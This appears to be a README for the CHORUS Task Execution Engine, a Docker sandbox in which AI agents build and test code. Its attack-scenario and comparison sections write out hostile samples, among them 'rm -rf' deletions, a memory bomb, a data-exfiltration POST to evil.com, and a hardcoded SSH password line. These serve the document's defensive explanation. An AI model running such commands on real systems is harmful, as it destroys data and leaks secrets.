# CHORUS Task Execution Engine **Secure, Isolated, and Lightning-Fast Code Execution for Autonomous Agents** --- ## Table of Contents 1. [Overview](#overview) 2. [For Everyone: The Big Picture](#for-everyone-the-big-picture) 3. [How It Works: Step by Step](#how-it-works-step-by-step) 4. [For Developers: Technical Deep Dive](#for-developers-technical-deep-dive) 5. [Security & Isolation](#security--isolation) 6. [Performance Characteristics](#performance-characteristics) 7. [Comparison: Why This Approach?](#comparison-why-this-approach) 8. [Available Development Environments](#available-development-environments) 9. [Real-World Examples](#real-world-examples) 10. [Troubleshooting & FAQ](#troubleshooting--faq) --- ## Overview The **CHORUS Task Execution Engine** is the system that allows AI agents to safely execute code, build software, run tests, and produce artifacts—all without risking your host system. Think of it as giving the AI a completely isolated "workshop" where it can use real tools (compilers, interpreters, build systems) but can never accidentally damage anything outside that workspace. ### Key Features - ✅ **Complete Isolation** - Tasks run in containers that can't access your files or network - ✅ **Multi-Language Support** - Pre-configured environments for Rust, Go, Python, Node.js, Java, C/C++ - ✅ **Reproducible Builds** - Same environment every time, no "works on my machine" problems - ✅ **Resource Limited** - Control CPU, memory, disk usage to prevent runaway processes - ✅ **No SSH Required** - Direct API communication, no authentication complexity - ✅ **Instant Startup** - Containers stay warm, commands execute in milliseconds - ✅ **Full Monitoring** - Track resource usage, capture all output, audit all actions --- ## For Everyone: The Big Picture ### The Problem We're Solving When an AI agent needs to execute code, we face a dilemma: ``` ┌─────────────────────────────────────────┐ │ Option 1: Run directly on your system │ │ ✅ Fast │ │ ❌ Dangerous (AI could delete files) │ │ ❌ Unpredictable (depends on your OS) │ │ ❌ No resource limits │ └─────────────────────────────────────────┘ ┌─────────────────────────────────────────┐ │ Option 2: Run in isolated environment │ │ ✅ Safe (can't access your files) │ │ ✅ Predictable (same environment) │ │ ✅ Resource controlled │ │ ✅ Easy to reset if something breaks │ └─────────────────────────────────────────┘ ``` CHORUS chooses **Option 2** using Docker containers as secure, isolated workspaces. ### The Analogy: Virtual Workshop Imagine hiring a contractor to build something: **Traditional Approach (Unsafe):** ``` You: "Here are the keys to my house. Build me a bookshelf." Contractor: *Has access to everything in your house* ``` **CHORUS Approach (Safe):** ``` You: "Here's a fully-equipped workshop in my garage." "All the tools you need are inside." "You can only access materials I put in the 'input' box." "Put the finished bookshelf in the 'output' box." "The workshop door locks from the outside—you can't leave." Contractor: *Has everything needed, but can't access your house* ``` This is exactly what CHORUS does with code execution—except the "workshop" is a Docker container. ### Visual Overview ``` ┌─────────────────────────────────────────────────────────────────┐ │ CHORUS AGENT │ │ "I need to compile this Rust project and run tests" │ └────────────────────────┬────────────────────────────────────────┘ │ ▼ ┌─────────────────────────────────────────────────────────────────┐ │ TASK EXECUTION ENGINE │ │ 1. Detect language: "Rust" │ │ 2. Select image: anthonyrawlins/chorus-rust-dev │ │ 3. Create isolated container │ │ 4. Execute commands safely │ └────────────────────────┬────────────────────────────────────────┘ │ ▼ ┌─────────────────────────────────────────────────────────────────┐ │ 🐳 ISOLATED DOCKER CONTAINER │ │ ┌───────────────────────────────────────────────────────────┐ │ │ │ 📁 /workspace/ │ │ │ │ ├── 📖 input/ (read-only: source code from user) │ │ │ │ ├── 🔨 data/ (working: builds, temp files) │ │ │ │ └── 📦 output/ (deliverables: binaries, reports) │ │ │ │ │ │ │ │ 🔧 Pre-installed Tools: │ │ │ │ • rustc (Rust compiler) │ │ │ │ • cargo (Rust build tool) │ │ │ │ • clippy (Rust linter) │ │ │ │ • git, vim, curl, etc. │ │ │ │ │ │ │ │ 🛡️ Security Boundaries: │ │ │ │ • No network access (configurable) │ │ │ │ • No access to host files │ │ │ │ • Limited CPU: 2 cores │ │ │ │ • Limited RAM: 2GB │ │ │ │ • Non-root user: chorus (UID 1000) │ │ │ └───────────────────────────────────────────────────────────┘ │ └─────────────────────────────────────────────────────────────────┘ │ ▼ ┌─────────────────────────────────────────────────────────────────┐ │ RESULTS RETURNED │ │ ✅ Exit code: 0 (success) │ │ 📄 stdout: "Compiling myapp v0.1.0..." │ │ 📄 stderr: "warning: unused variable..." │ │ 📦 Artifacts: [myapp binary, test results] │ │ ⏱️ Duration: 45.3 seconds │ │ 💾 Memory used: 1.2GB / 2GB │ └─────────────────────────────────────────────────────────────────┘ ``` --- ## How It Works: Step by Step ### Phase 1: Setup (happens once per task) ``` Step 1: Language Detection ┌─────────────────────────────────────────┐ │ Task: "Fix Rust compilation error" │ │ │ │ Detection Logic: │ │ 1. Check explicit language field │ │ 2. Analyze repository URL patterns │ │ 3. Scan description for keywords │ │ │ │ Result: Language = "rust" │ └─────────────────────────────────────────┘ ↓ Step 2: Image Selection ┌─────────────────────────────────────────┐ │ Language: "rust" │ │ │ │ Image Map: │ │ rust → chorus-rust-dev │ │ go → chorus-go-dev │ │ python → chorus-python-dev │ │ ... │ │ │ │ Selected: anthonyrawlins/chorus-rust-dev│ └─────────────────────────────────────────┘ ↓ Step 3: Container Creation ┌─────────────────────────────────────────┐ │ Pull Image (if not cached): │ │ docker pull anthonyrawlins/ │ │ chorus-rust-dev:latest │ │ │ │ Create Container: │ │ • Image: chorus-rust-dev │ │ • Memory: 2GB limit │ │ • CPU: 2 cores │ │ • Network: isolated (no internet) │ │ • Filesystem: isolated │ │ │ │ Keep-Alive Command: │ │ tail -f /dev/null │ │ (container stays running, ready for │ │ commands, but does nothing actively) │ └─────────────────────────────────────────┘ ``` ### Phase 2: Execution (repeats for each command) ``` Step 4: Command Execution ┌─────────────────────────────────────────┐ │ Command: cargo build --release │ │ │ │ Via Docker Exec API: │ │ POST /containers/{id}/exec │ │ { │ │ "Cmd": ["cargo", "build", "--release"]│ │ "WorkingDir": "/workspace/data" │ │ "AttachStdout": true │ │ "AttachStderr": true │ │ } │ │ │ │ Response: exec_id = "abc123" │ └─────────────────────────────────────────┘ ↓ Step 5: Stream Output ┌─────────────────────────────────────────┐ │ POST /exec/abc123/start │ │ │ │ Binary stream (multiplexed): │ │ [stdout] Compiling myapp v0.1.0... │ │ [stdout] Compiling deps v1.0.0 │ │ [stderr] warning: unused variable │ │ [stdout] Finished release [opt] │ │ │ │ CHORUS demultiplexes into separate │ │ stdout and stderr buffers │ └─────────────────────────────────────────┘ ↓ Step 6: Wait for Completion ┌─────────────────────────────────────────┐ │ Poll every 100ms: │ │ GET /exec/abc123/json │ │ │ │ Response: │ │ { │ │ "Running": false, │ │ "ExitCode": 0, │ │ "Pid": 12345 │ │ } │ │ │ │ Command completed successfully! │ └─────────────────────────────────────────┘ ``` ### Phase 3: File Operations ``` Writing Files (Code → Container) ┌─────────────────────────────────────────┐ │ Create tar archive in memory: │ │ │ │ [tar header: "main.rs", size: 1024] │ │ [file content: "fn main() { ... }"] │ │ │ │ PUT /containers/{id}/archive │ │ Target: /workspace/data/src/main.rs │ │ │ │ Result: File appears in container │ └─────────────────────────────────────────┘ Reading Files (Container → Result) ┌─────────────────────────────────────────┐ │ GET /containers/{id}/archive │ │ Path: /workspace/output/myapp │ │ │ │ Response: tar stream │ │ [tar header: "myapp", size: 4194304] │ │ [binary content: ELF executable] │ │ │ │ Extract from tar → return to agent │ └─────────────────────────────────────────┘ ``` ### Phase 4: Cleanup ``` Step 7: Resource Cleanup ┌─────────────────────────────────────────┐ │ When task completes: │ │ │ │ 1. docker stop {container_id} │ │ (graceful shutdown: 30s timeout) │ │ │ │ 2. docker rm {container_id} │ │ (delete container completely) │ │ │ │ 3. Remove temporary files on host │ │ │ │ Result: Zero traces left behind │ └─────────────────────────────────────────┘ ``` --- ## For Developers: Technical Deep Dive ### Architecture Components ``` ┌───────────────────────────────────────────────────────────────────┐ │ TaskExecutionEngine │ │ Location: pkg/execution/engine.go │ │ │ │ Responsibilities: │ │ • Orchestrate task execution lifecycle │ │ • Coordinate between AI providers and sandboxes │ │ • Parse AI responses for executable commands │ │ • Collect and format results │ │ • Track metrics and resource usage │ └─────────────────────────────┬─────────────────────────────────────┘ │ │ creates ▼ ┌───────────────────────────────────────────────────────────────────┐ │ ImageSelector │ │ Location: pkg/execution/images.go │ │ │ │ Responsibilities: │ │ • Detect language from task context │ │ • Map language to appropriate Docker image │ │ • Provide image metadata and capabilities │ │ │ │ Detection Priority: │ │ 1. context.language field (explicit) │ │ 2. AI model name hints │ │ 3. Repository URL patterns │ │ 4. Description keyword analysis │ └─────────────────────────────┬─────────────────────────────────────┘ │ │ provides image name ▼ ┌───────────────────────────────────────────────────────────────────┐ │ ExecutionSandbox (Interface) │ │ Location: pkg/execution/sandbox.go │ │ │ │ Interface Methods: │ │ • Initialize(ctx, config) error │ │ • ExecuteCommand(ctx, cmd) (*CommandResult, error) │ │ • WriteFile(ctx, path, content, mode) error │ │ • ReadFile(ctx, path) ([]byte, error) │ │ • ListFiles(ctx, path) ([]FileInfo, error) │ │ • GetResourceUsage(ctx) (*ResourceUsage, error) │ │ • Cleanup() error │ └─────────────────────────────┬─────────────────────────────────────┘ │ │ implemented by ▼ ┌───────────────────────────────────────────────────────────────────┐ │ DockerSandbox │ │ Location: pkg/execution/docker.go │ │ │ │ Key Fields: │ │ • client: *docker.Client (Docker SDK) │ │ • containerID: string (running container) │ │ • config: *SandboxConfig (resource limits, security) │ │ • workingDir: string (default: /workspace/data) │ │ • environment: map[string]string │ │ │ │ Implementation Details: │ │ • Uses official Docker SDK for Go │ │ • Communicates via Unix socket /var/run/docker.sock │ │ • Never spawns subprocesses (all via API) │ │ • Multiplexes stdout/stderr from binary stream │ │ • Streams files via tar archives │ └───────────────────────────────────────────────────────────────────┘ ``` ### Code Flow Diagram ```go // 1. ENGINE RECEIVES TASK func (e *DefaultTaskExecutionEngine) ExecuteTask( ctx context.Context, request *TaskExecutionRequest, ) (*TaskExecutionResult, error) { // 2. CREATE SANDBOX CONFIG sandboxConfig := e.createSandboxConfig(request) // Inside createSandboxConfig: imageSelector := NewImageSelector() selectedImage := imageSelector.SelectImageForTask(request) // Result: "anthonyrawlins/chorus-rust-dev:latest" config := &SandboxConfig{ Image: selectedImage, WorkingDir: "/workspace/data", Environment: map[string]string{ "WORKSPACE_ROOT": "/workspace", "WORKSPACE_INPUT": "/workspace/input", "WORKSPACE_DATA": "/workspace/data", "WORKSPACE_OUTPUT": "/workspace/output", }, Resources: ResourceLimits{ MemoryLimit: 2 * 1024 * 1024 * 1024, // 2GB CPULimit: 2.0, // 2 cores }, Security: SecurityPolicy{ NoNewPrivileges: true, AllowNetworking: false, DropCapabilities: []string{"ALL"}, }, } // 3. INITIALIZE SANDBOX sandbox := NewDockerSandbox() sandbox.Initialize(ctx, config) defer sandbox.Cleanup() // 4. EXECUTE COMMANDS cmd := &Command{ Executable: "/bin/sh", Args: []string{"-c", "cargo build --release"}, WorkingDir: "/workspace/data", Timeout: 5 * time.Minute, } result, err := sandbox.ExecuteCommand(ctx, cmd) // 5. COLLECT ARTIFACTS if result.ExitCode == 0 { binaryContent, _ := sandbox.ReadFile(ctx, "/workspace/data/target/release/myapp") artifacts = append(artifacts, TaskArtifact{ Name: "myapp", Type: "binary", Content: binaryContent, Size: len(binaryContent), }) } // 6. RETURN RESULTS return &TaskExecutionResult{ Success: result.ExitCode == 0, Output: result.Stdout, Artifacts: artifacts, Metrics: &ExecutionMetrics{ Duration: result.Duration, CommandsExecuted: 1, ResourceUsage: result.ResourceUsage, }, }, nil } ``` ### Docker API Communication **What Actually Happens Under the Hood:** ``` Host (CHORUS Process) Docker Daemon │ │ │ Unix Socket Connection │ │ /var/run/docker.sock │ ├───────────────────────────────┤ │ │ │ POST /v1.43/containers/create │ │ { │ │ "Image": "chorus-rust-dev", │ │ "Cmd": ["tail","-f","/dev/null"] │ "HostConfig": { │ │ "Memory": 2147483648, │ │ "NanoCPUs": 2000000000, │ │ "CapDrop": ["ALL"] │ │ } │ │ } │ ├──────────────────────────────>│ │ │ Create container │<──────────────────────────────┤ │ 201 Created │ │ {"Id": "abc123def456..."} │ │ │ │ POST /v1.43/containers/ │ │ abc123/start │ ├──────────────────────────────>│ │ │ Start container │<──────────────────────────────┤ │ 204 No Content │ │ │ │ POST /v1.43/containers/ │ │ abc123/exec │ │ { │ │ "AttachStdout": true, │ │ "AttachStderr": true, │ │ "Cmd": ["cargo","build"] │ │ } │ ├──────────────────────────────>│ │ │ Create exec instance │<──────────────────────────────┤ │ 201 Created │ │ {"Id": "exec789xyz..."} │ │ │ │ POST /v1.43/exec/exec789/start│ ├──────────────────────────────>│ │ │ Execute command │<══════════════════════════════┤ (Binary stream) │ [stdout stream] │ cargo output │ [stderr stream] │ warnings │<══════════════════════════════┤ │ Stream ends │ │ │ │ GET /v1.43/exec/exec789/json │ ├──────────────────────────────>│ │ │ Check status │<──────────────────────────────┤ │ {"Running": false, │ │ "ExitCode": 0} │ │ │ │ DELETE /v1.43/containers/ │ │ abc123?force=true │ ├──────────────────────────────>│ │ │ Remove container │<──────────────────────────────┤ │ 204 No Content │ │ │ ``` ### Key Implementation Files | File | Purpose | Key Functions | |------|---------|---------------| | `pkg/execution/engine.go` | Main orchestration | `ExecuteTask()`, `createSandboxConfig()`, `executeTaskInternal()` | | `pkg/execution/images.go` | Image selection logic | `SelectImageForTask()`, `DetectLanguage()`, `detectLanguageFromDescription()` | | `pkg/execution/sandbox.go` | Sandbox interface | Interface definitions for all sandbox implementations | | `pkg/execution/docker.go` | Docker implementation | `Initialize()`, `ExecuteCommand()`, `WriteFile()`, `ReadFile()`, `Cleanup()` | ### Critical Code Sections **1. Command Execution (docker.go:115-239)** ```go func (d *DockerSandbox) ExecuteCommand(ctx context.Context, cmd *Command) (*CommandResult, error) { // Build command execCmd := []string{cmd.Executable} execCmd = append(execCmd, cmd.Args...) // Create exec instance execConfig := container.ExecOptions{ AttachStdout: true, AttachStderr: true, Cmd: execCmd, WorkingDir: cmd.WorkingDir, Env: d.buildEnvironment(cmd.Environment), } exec, err := d.client.ContainerExecCreate(ctx, d.containerID, execConfig) // Attach and stream output resp, err := d.client.ContainerExecAttach(ctx, exec.ID, attachOptions) defer resp.Close() // Demultiplex Docker's binary stream format var stdout, stderr bytes.Buffer d.demultiplexOutput(resp.Reader, &stdout, &stderr) // Poll for completion for { inspect, err := d.client.ContainerExecInspect(ctx, exec.ID) if !inspect.Running { return &CommandResult{ ExitCode: inspect.ExitCode, Stdout: stdout.String(), Stderr: stderr.String(), }, nil } time.Sleep(100 * time.Millisecond) } } ``` **2. Output Demultiplexing (docker.go:876-915)** Docker multiplexes stdout and stderr into a single binary stream with this format: ``` Byte 0: Stream Type (1=stdout, 2=stderr) Bytes 1-3: Padding (always 0) Bytes 4-7: Frame Size (big-endian uint32) Bytes 8+: Frame Data ``` ```go func (d *DockerSandbox) demultiplexOutput(reader io.Reader, stdout, stderr io.Writer) error { buf := make([]byte, 8192) for { n, err := reader.Read(buf) if n < 8 { continue // Need at least 8 bytes for header } streamType := buf[0] // 1=stdout, 2=stderr size := int(buf[4])<<24 + // Parse 32-bit size int(buf[5])<<16 + int(buf[6])<<8 + int(buf[7]) data := buf[8 : 8+size] // Extract frame data switch streamType { case 1: stdout.Write(data) // Route to stdout case 2: stderr.Write(data) // Route to stderr } } } ``` **3. Image Selection Logic (images.go:74-154)** ```go func (s *ImageSelector) DetectLanguage(task *TaskExecutionRequest) string { // Priority 1: Explicit language field if lang, ok := task.Context["language"].(string); ok && lang != "" { return strings.ToLower(strings.TrimSpace(lang)) } // Priority 2: Model name hints if task.Requirements != nil && task.Requirements.AIModel != "" { if modelLang := extractLanguageFromModel(task.Requirements.AIModel); modelLang != "" { return modelLang } } // Priority 3: Repository URL patterns if repoURL, ok := task.Context["repository_url"].(string); ok && repoURL != "" { return detectLanguageFromRepo(repoURL) } // Priority 4: Description keyword analysis return detectLanguageFromDescription(task.Description) } func detectLanguageFromDescription(description string) string { keywords := []struct { language string patterns []string priority int }{ // High priority - specific indicators {"rust", []string{"cargo.toml", "cargo build", ".rs file"}, 3}, {"python", []string{"pip install", "pytest", "requirements.txt"}, 3}, // Medium priority - generic mentions {"rust", []string{"rust"}, 2}, {"python", []string{"python"}, 2}, } bestMatch := "" bestPriority := 0 for _, kw := range keywords { for _, pattern := range kw.patterns { if strings.Contains(strings.ToLower(description), pattern) { if kw.priority > bestPriority { bestMatch = kw.language bestPriority = kw.priority } } } } return bestMatch // Returns "base" if no match } ``` --- ## Security & Isolation ### Defense in Depth: Multiple Security Layers ``` ┌──────────────────────────────────────────────────────────────────┐ │ Layer 1: Linux Kernel Namespaces │ │ ─────────────────────────────────────────────────────────────── │ │ • PID Namespace: Container can't see host processes │ │ • Network Namespace: Isolated network stack (default: no net) │ │ • Mount Namespace: Container can't see host filesystem │ │ • IPC Namespace: No shared memory with host │ │ • UTS Namespace: Separate hostname │ │ • User Namespace: UID mapping for file permissions │ └──────────────────────────────────────────────────────────────────┘ ↓ ┌──────────────────────────────────────────────────────────────────┐ │ Layer 2: Control Groups (cgroups) │ │ ─────────────────────────────────────────────────────────────── │ │ • Memory Limit: 2GB hard limit (OOM kill if exceeded) │ │ • CPU Limit: 2 cores maximum │ │ • PID Limit: 100 processes maximum │ │ • Block I/O: Rate limiting on disk operations │ │ • No access to host's /sys, /proc │ └──────────────────────────────────────────────────────────────────┘ ↓ ┌──────────────────────────────────────────────────────────────────┐ │ Layer 3: Linux Capabilities │ │ ─────────────────────────────────────────────────────────────── │ │ Dropped Capabilities (CapDrop: ALL): │ │ • CAP_SYS_ADMIN: Can't modify system settings │ │ • CAP_NET_ADMIN: Can't modify network configuration │ │ • CAP_SYS_MODULE: Can't load kernel modules │ │ • CAP_SYS_RAWIO: Can't access raw I/O │ │ • ALL other capabilities dropped │ │ │ │ Added Capabilities (minimal): │ │ • None by default │ │ • NET_BIND_SERVICE only if networking enabled │ └──────────────────────────────────────────────────────────────────┘ ↓ ┌──────────────────────────────────────────────────────────────────┐ │ Layer 4: Seccomp (Secure Computing Mode) │ │ ─────────────────────────────────────────────────────────────── │ │ Blocked System Calls: │ │ • reboot, swapon, swapoff │ │ • mount, umount (filesystem manipulation) │ │ • kexec_load (kernel execution) │ │ • ptrace (process debugging/manipulation) │ │ • 300+ other dangerous syscalls │ └──────────────────────────────────────────────────────────────────┘ ↓ ┌──────────────────────────────────────────────────────────────────┐ │ Layer 5: AppArmor / SELinux (MAC) │ │ ─────────────────────────────────────────────────────────────── │ │ Mandatory Access Control profiles: │ │ • Restrict which files can be read/written │ │ • Block access to sensitive host paths │ │ • Prevent privilege escalation │ └──────────────────────────────────────────────────────────────────┘ ↓ ┌──────────────────────────────────────────────────────────────────┐ │ Layer 6: Read-Only Root Filesystem │ │ ─────────────────────────────────────────────────────────────── │ │ • Root filesystem mounted read-only │ │ • Only /workspace/* is writable │ │ • No modification of system binaries │ │ • No installation of packages (use pre-built images) │ └──────────────────────────────────────────────────────────────────┘ ↓ ┌──────────────────────────────────────────────────────────────────┐ │ Layer 7: Network Isolation │ │ ─────────────────────────────────────────────────────────────── │ │ Default: NetworkMode = "none" │ │ • No network interfaces (except loopback) │ │ • Can't make outbound connections │ │ • Can't receive inbound connections │ │ • Configurable if task requires network │ └──────────────────────────────────────────────────────────────────┘ ↓ ┌──────────────────────────────────────────────────────────────────┐ │ Layer 8: Non-Root User │ │ ─────────────────────────────────────────────────────────────── │ │ • Runs as user "chorus" (UID 1000) │ │ • Not in sudoers │ │ • No password authentication │ │ • Can't escalate to root (no-new-privileges flag) │ └──────────────────────────────────────────────────────────────────┘ ``` ### Security Configuration (Code) ```go // pkg/execution/docker.go:558-641 func (d *DockerSandbox) buildHostConfig() *container.HostConfig { return &container.HostConfig{ // Resource Limits Resources: container.Resources{ Memory: 2 * 1024 * 1024 * 1024, // 2GB NanoCPUs: 2000000000, // 2 cores PidsLimit: ptr(100), // 100 processes max }, // Security Options SecurityOpt: []string{ "no-new-privileges:true", // Prevent privilege escalation "seccomp=/etc/docker/seccomp.json", // Syscall filtering "apparmor=docker-default", // AppArmor profile }, // Capabilities (drop all by default) CapDrop: []string{"ALL"}, CapAdd: []string{}, // Add none unless specifically needed // Network Isolation NetworkMode: "none", // No network access // Filesystem Security ReadonlyRootfs: true, // Read-only root // Process Isolation IpcMode: "private", // No shared IPC PidMode: "private", // Can't see host processes // Never privileged Privileged: false, } } ``` ### What Can and Cannot Happen | Action | Possible? | Why? | |--------|-----------|------| | **Read host files** | ❌ No | Mount namespace isolation | | **Write host files** | ❌ No | Mount namespace isolation | | **See host processes** | ❌ No | PID namespace isolation | | **Access host network** | ❌ No | Network namespace = "none" | | **Use more than 2GB RAM** | ❌ No | OOM killer terminates process | | **Use more than 2 CPU cores** | ❌ No | CFS scheduler throttles | | **Spawn 1000 processes** | ❌ No | PID limit = 100 | | **Load kernel modules** | ❌ No | CAP_SYS_MODULE dropped | | **Reboot system** | ❌ No | Seccomp blocks reboot syscall | | **Escalate to root** | ❌ No | no-new-privileges flag | | **Compile code** | ✅ Yes | Compiler included in image | | **Run tests** | ✅ Yes | Test frameworks pre-installed | | **Read /workspace/input** | ✅ Yes | Mounted read-only | | **Write to /workspace/data** | ✅ Yes | Working directory | | **Create artifacts in /workspace/output** | ✅ Yes | Output directory | ### Real-World Attack Scenarios (and how we prevent them) **Scenario 1: Malicious Code Tries to Delete Host Files** ```bash # Malicious command attempted by compromised AI rm -rf /host/important_data # What actually happens: # ❌ /host/important_data doesn't exist in container namespace # ✅ Even if it did, read-only root filesystem prevents deletion # ✅ Mount namespace prevents access to host paths # Result: Command fails harmlessly ``` **Scenario 2: Infinite Loop Consumes All CPU** ```rust // Malicious code loop { // Busy loop attempting to DoS host let x = 1 + 1; } // What actually happens: // ✅ CFS scheduler limits to 2 cores maximum // ✅ Host system still has remaining cores available // ✅ Timeout kills container after 5 minutes // Result: Host remains responsive ``` **Scenario 3: Memory Bomb Attempts to Crash System** ```python # Malicious code data = [] while True: data.append('x' * 10000000) # Allocate 10MB per iteration # What actually happens: # ✅ Memory limit = 2GB enforced by cgroups # ✅ When exceeded, OOM killer terminates process # ✅ Host memory unaffected # Result: Container terminated, host protected ``` **Scenario 4: Attempts Network Exfiltration of Data** ```go // Malicious code http.Post("http://evil.com/steal", "application/json", secretData) // What actually happens: // ❌ No network interfaces available (NetworkMode="none") // ❌ Can't resolve DNS // ❌ Can't create TCP connections // Result: Network call fails immediately ``` --- ## Performance Characteristics ### Startup Times ``` ┌─────────────────────────────────────────────────────────────┐ │ Operation Time Notes │ ├─────────────────────────────────────────────────────────────┤ │ Image pull (first time) 30-120s One-time cost │ │ Image pull (cached) 0ms Already local │ │ Container creation 200-500ms Create config │ │ Container start 100-300ms Process spawn │ │ First exec command 10-50ms Setup overhead │ │ Subsequent exec commands 5-15ms Amortized │ │ File copy (1MB) 20-50ms Tar streaming │ │ Container stop & remove 100-200ms Graceful │ └─────────────────────────────────────────────────────────────┘ Total for "Hello World" task: 400-850ms (cached image) Total for Rust compilation: 45-120s (depends on project size) ``` ### Resource Overhead ``` Component Memory Overhead CPU Overhead ───────────────────────────────────────────────────────── Docker daemon 50-100MB 1-2% idle Container runtime 20-50MB <1% idle Executing process Actual + 10-20MB Actual + 2-3% CHORUS orchestration 30-50MB 1-2% ───────────────────────────────────────────────────────── Total overhead ~150MB ~5% ``` ### Comparison: Different Execution Models ``` ┌──────────────────────────────────────────────────────────────────┐ │ Metric │ Docker Exec │ New Container │ SSH │ Native │ │ │ (CHORUS) │ Per Command │ │ │ ├──────────────────────────────────────────────────────────────────┤ │ Startup Time │ 400ms │ 2-5s │ 50ms │ 0ms │ │ Command Latency │ 10ms │ N/A │ 30ms │ 0ms │ │ Memory Overhead │ 150MB │ 200MB │ 100MB│ 0MB │ │ File Persistence │ ✅ Yes │ ❌ No │ ✅ Yes│ N/A │ │ Security Isolation│ ✅ Full │ ✅ Full │ ⚠️ Partial│❌ None│ │ Setup Complexity │ ⭐ Low │ ⭐ Low │ ⭐⭐⭐ High│⭐ Low │ │ State Between Cmds│ ✅ Yes │ ❌ No │ ✅ Yes│ N/A │ │ API vs CLI │ ✅ API │ ⚠️ CLI │ ⚠️ CLI│ N/A │ └──────────────────────────────────────────────────────────────────┘ Winner: Docker Exec (CHORUS approach) ✨ • Persistent state between commands • Low latency after warmup • Full isolation • No authentication complexity • Direct API access (no CLI parsing) ``` ### Performance Optimization Strategies **1. Container Warmup** ```go // Container stays alive between commands Cmd: []string{"tail", "-f", "/dev/null"} // Benefits: // • No restart overhead // • Cached filesystem state // • Amortized startup cost ``` **2. Image Pre-pulling** ```bash # Pre-pull on cluster nodes docker pull anthonyrawlins/chorus-rust-dev:latest docker pull anthonyrawlins/chorus-go-dev:latest docker pull anthonyrawlins/chorus-python-dev:latest # Result: Zero pull time during task execution ``` **3. Layer Caching** ```dockerfile # All language images share base layer FROM debian:bookworm AS base # Base layer: 643MB (shared across all images) FROM base AS rust-dev # Only Rust-specific layers downloaded # Effective size: ~1.8GB additional ``` **4. Efficient File Transfer** ```go // Use tar streaming (not individual file copies) buf := new(bytes.Buffer) tw := tar.NewWriter(buf) // Add multiple files to single tar // Transfer entire archive in one API call ``` --- ## Comparison: Why This Approach? ### Alternative 1: SSH into Container ``` ┌─────────────────────────────────────────────────────────────┐ │ How it would work: │ │ 1. Install openssh-server in container │ │ 2. Generate SSH keys │ │ 3. Start sshd daemon │ │ 4. SSH from CHORUS to container │ │ 5. Execute commands via SSH session │ └─────────────────────────────────────────────────────────────┘ Problems: ❌ Extra attack surface (sshd vulnerabilities) ❌ Key management complexity ❌ Authentication overhead ❌ Extra memory (sshd process) ❌ Port management (need unique ports) ❌ Terminal emulation complexity ❌ Less portable (SSH not always available) Example: # Dockerfile additions needed RUN apt-get install -y openssh-server && \ mkdir /var/run/sshd && \ echo 'chorus:password' | chpasswd CMD ["/usr/sbin/sshd", "-D"] # Code complexity conn, err := ssh.Dial("tcp", fmt.Sprintf("localhost:%d", containerPort), sshConfig) session, err := conn.NewSession() output, err := session.CombinedOutput("cargo build") ``` ### Alternative 2: New Container Per Command ``` ┌─────────────────────────────────────────────────────────────┐ │ How it would work: │ │ 1. Create container for command │ │ 2. Run: docker run --rm image cargo build │ │ 3. Wait for completion │ │ 4. Container auto-removes │ │ 5. Repeat for next command │ └─────────────────────────────────────────────────────────────┘ Problems: ❌ Slow (2-5s startup per command) ❌ No state persistence between commands ❌ Can't cd between commands ❌ Can't set environment variables ❌ Wasteful (recreate same environment) ❌ Higher resource churn Example: // Command 1 docker run --rm chorus-rust-dev cargo build // 2-5 second startup, builds in /workspace // Command 2 docker run --rm chorus-rust-dev cargo test // PROBLEM: Previous build artifacts gone! // Must rebuild everything again ``` ### Alternative 3: Direct Host Execution ``` ┌─────────────────────────────────────────────────────────────┐ │ How it would work: │ │ 1. Run commands directly on host OS │ │ 2. No containers, no isolation │ └─────────────────────────────────────────────────────────────┘ Problems: ❌ EXTREMELY DANGEROUS (AI has full system access) ❌ Unpredictable (depends on host OS) ❌ "Works on my machine" syndrome ❌ No resource limits ❌ No cleanup (files left behind) ❌ Dependency conflicts ❌ Security nightmare Example: // If AI gets compromised or makes mistake: exec.Command("rm", "-rf", "/").Run() // 💀 Your entire system is gone ``` ### Why Docker Exec is Optimal ``` ┌──────────────────────────────────────────────────────────────┐ │ ✅ CHORUS Approach Wins │ ├──────────────────────────────────────────────────────────────┤ │ Security │ ⭐⭐⭐⭐⭐ Full isolation, multiple layers│ │ Performance │ ⭐⭐⭐⭐⭐ Fast after warmup (10ms/cmd) │ │ Simplicity │ ⭐⭐⭐⭐⭐ Zero config, no auth needed │ │ State Persistence │ ⭐⭐⭐⭐⭐ Files persist between commands│ │ Reproducibility │ ⭐⭐⭐⭐⭐ Same env every time │ │ Resource Control │ ⭐⭐⭐⭐⭐ CPU, memory, disk limits │ │ API Quality │ ⭐⭐⭐⭐⭐ Official Go SDK, well-tested │ │ Portability │ ⭐⭐⭐⭐⭐ Works anywhere Docker runs │ └──────────────────────────────────────────────────────────────┘ ``` --- ## Available Development Environments All images are publicly available on Docker Hub: `docker.io/anthonyrawlins/chorus-*` ### Image Catalog | Image | Base Size | Tools Included | Use Cases | |-------|-----------|----------------|-----------| | **chorus-base** | 643MB | git, curl, wget, vim, jq, build-essential, netcat, zip/tar | Shell scripts, generic tasks, text processing | | **chorus-rust-dev** | 2.42GB | rustc 1.77+, cargo, clippy, rustfmt, rust-analyzer, ripgrep, fd-find, bat | Rust compilation, cargo builds, clippy linting, formatting | | **chorus-go-dev** | 1GB | go1.22, gopls, delve, staticcheck, golangci-lint | Go builds, go mod operations, testing, linting | | **chorus-python-dev** | 1.07GB | python3.11, uv, pip-tools, ruff, black, mypy, pytest, pylint, ipython | Python scripts, pip installs, testing, type checking | | **chorus-node-dev** | 982MB | node20, npm, pnpm, yarn, typescript, ts-node, eslint, prettier, nodemon | npm builds, TypeScript compilation, testing, linting | | **chorus-java-dev** | 1.3GB | openjdk-17, maven, gradle | Maven/Gradle builds, Java compilation, JUnit testing | | **chorus-cpp-dev** | 1.63GB | gcc, g++, clang, cmake, ninja, gdb, valgrind, doxygen | C/C++ compilation, CMake builds, debugging, profiling | ### Workspace Structure (Standardized Across All Images) ``` /workspace/ ├── input/ Read-only source code, task inputs │ ├── src/ │ ├── README.md │ └── Cargo.toml │ ├── data/ Working directory for builds and temporary files │ ├── target/ (Rust build artifacts) │ ├── node_modules/ (Node dependencies) │ └── .cache/ (Various caches) │ └── output/ Final deliverables and artifacts ├── myapp (compiled binary) ├── test-results.xml └── coverage.html ``` ### Environment Variables (All Images) ```bash WORKSPACE_ROOT=/workspace WORKSPACE_INPUT=/workspace/input WORKSPACE_DATA=/workspace/data WORKSPACE_OUTPUT=/workspace/output ``` ### Example: Using Each Image **Rust Development:** ```bash docker run --rm -v $(pwd):/workspace/input:ro \ anthonyrawlins/chorus-rust-dev:latest \ bash -c "cd 